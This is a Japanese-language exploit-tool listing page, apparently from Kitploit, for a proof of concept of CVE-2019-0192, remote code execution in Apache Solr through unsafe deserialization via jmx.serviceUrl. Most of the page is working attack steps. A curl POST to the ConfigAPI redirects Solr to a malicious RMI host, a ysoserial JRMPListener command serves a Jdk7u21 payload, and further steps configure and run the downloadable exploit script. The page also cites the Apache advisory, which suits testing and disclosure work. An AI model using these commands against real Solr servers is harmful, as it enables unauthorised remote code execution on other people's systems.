Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2019-0192 — jmx.serviceUrl を介した信頼できないデータのデシリアライゼーションによる Apache Solr での RCE | Kitploit
ツール/GitHubGitHub/mpgn/cve-2019-0192
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストリモートアクセスツールペイロード開発
GitHubmpgn/cve-2019-0192

CVE-2019-0192

jmx.serviceUrl を介した信頼できないデータのデシリアライゼーションによる Apache Solr での RCE

リポジトリを見る
2085537年前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2019-0192 - Apache Solr RCE 5.0.0 から 5.5.5 および 6.0.0 から 6.6.5

Apache Solr RCE の初期の PoC です

https://issues.apache.org/jira/browse/SOLR-13301 より:

ConfigAPI は、HTTP POST リクエストを介して Solr の JMX サーバーを設定できます。 これを悪意のある RMI サーバーに向けることで、攻撃者は Solr の安全でない逆シリアライゼーションを悪用して、 Solr 側でリモートコード実行を引き起こす可能性があります。

概念実証

image


セキュリティアドバイザリの説明を確認し、Apache Solr の ConfigAPI リソース を調べると、JMX サーバーへの言及を見つけることができます:

image

serviceUrl - (オプションの str) JMX サーバーのサービス URL。指定しない場合は、デフォルトのプラットフォーム MBean サーバーが使用されます。

ConfigAPI の仕組みを確認することで、リモート JMX サーバーを設定する方法を再現できます:

root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

PoC では、yoserial を使用して、ペイロード Jdk7u21 を使った悪意のある RMI サーバーを作成します。

  1. 悪意のある RMI サーバーを起動します:
root@kitploit:~
java -cp ysoserial-master-ff59523eb6-1.jar ysoserial.exploit.JRMPListener 1099 Jdk7u21 "touch /tmp/pwn.txt"
  1. POST リクエストを実行します:
root@kitploit:~
curl -i -s -k  -X $'POST' \
    -H $'Host: 127.0.0.1:8983' \
    -H $'Content-Type: application/json' \
    --data-binary $'{\"set-property\":{\"jmx.serviceUrl\":\"service:jmx:rmi:///jndi/rmi://malicousrmierver.com:1099/obj\"}}' \
    $'http://127.0.0.1:8983/solr/techproducts/config/jmx'

注: きれいなスタックトレース付きの 500 エラーが返るはずです。

  1. スタックトレースを確認します:
  • このエラー "Non-annotation type in annotation serial stream" が表示された場合、Apache Solr が JRE 7u25 より新しい Java バージョンで実行されていることを意味するため、この PoC は機能しません。

  • それ以外の場合は、このエラー "undeclared checked exception; nested exception is" が表示され、PoC は機能するはずです。

エクスプロイト

  1. yoserial をダウンロードします: https://jitpack.io/com/github/frohoff/ysoserial/master-SNAPSHOT/ysoserial-master-SNAPSHOT.jar
  2. スクリプト内の値を変更します:
root@kitploit:~
remote = "http://172.18.0.5:8983"
ressource = ""
RHOST = "172.18.0.1"
RPORT = "1099"
  1. 次にスクリプトを実行します:
root@kitploit:~
python3 CVE-2019-0192.py

セキュリティアドバイザリ:

  • http://mail-archives.us.apache.org/mod_mbox/www-announce/201903.mbox/%3CCAECwjAV1buZwg%2BMcV9EAQ19MeAWztPVJYD4zGK8kQdADFYij1w%40mail.gmail.com%3E

リソース:

  • https://lucene.apache.org/solr/guide/6_6/config-api.html#ConfigAPI-CommandsforCommonProperties
  • https://issues.apache.org/jira/browse/SOLR-13301
ツールをダウンロード